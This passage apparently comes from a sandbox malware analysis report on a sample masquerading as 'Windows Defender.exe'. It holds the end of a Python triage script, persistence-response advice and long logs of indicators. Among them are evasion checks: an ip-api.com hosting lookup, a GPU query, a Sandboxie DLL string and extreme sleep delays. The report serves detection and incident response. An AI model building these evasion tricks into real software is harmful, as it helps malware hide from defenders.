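    for kind, payload in events:
        reasons = ASSESSORS.get(kind, lambda _: [])(payload)
        if reasons:
            findings.append((kind, reasons))
    return findings


if __name__ == "__main__":
    for kind, reasons in triage(SAMPLE_EVENTS):
        print(kind)
        for reason in reasons:
            print("  -", reason)
```

                      The scheduled task is the entry worth prioritising in response: deleting the Run value and the .lnk does nothing while a task re-executes the dropped binary every minute, so the task should be removed first and the binary quarantined before the next minute boundary.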

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (repeated across the powershell.exe instances; duplicate entries collapsed)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (repeated across the powershell.exe instances; duplicate entries collapsed. These are module-manifest reads during PowerShell's module auto-discovery; on their own they show only that powershell.exe ran, not what it executed)
                      Source: C:\Users\user\Desktop\Windows Defender.exe: Process information set: NOOPENFILEERRORBOX (SetErrorMode with SEM_NOOPENFILEERRORBOX: suppresses the dialog Windows would otherwise show when a file cannot be found, so a failed load stays silent; repeated for each call, duplicate entries collapsed)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Process information set: NOOPENFILEERRORBOX (repeated for each call; duplicate entries collapsed)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                      Source: C:\Users\user\Desktop\Windows Defender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: Windows Defender.exe, Windows Defender.exe.0.dr Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Windows Defender.exe Memory allocated: 1420000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Windows Defender.exe Memory allocated: 1AE90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Memory allocated: 1350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Memory allocated: 1AE50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Memory allocated: 11F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Memory allocated: 1AF50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Memory allocated: CB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Memory allocated: 1A730000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Memory allocated: 950000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Memory allocated: 1A700000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Windows Defender.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Windows Defender.exe Window / User API: threadDelayed 7284
                      Source: C:\Users\user\Desktop\Windows Defender.exe Window / User API: threadDelayed 2540
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5962
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3794
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8241
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1395
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7453
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2071
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7513
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2090
                      Source: C:\Users\user\Desktop\Windows Defender.exe TID: 1944 Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6244 Thread sleep count: 8241 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136 Thread sleep count: 1395 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648 Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664 Thread sleep count: 7453 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4372 Thread sleep count: 2071 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560 Thread sleep count: 7513 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612 Thread sleep count: 2090 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6032 Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe TID: 5272 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe TID: 3780 Thread sleep time: -922337203685477s >= -30000s
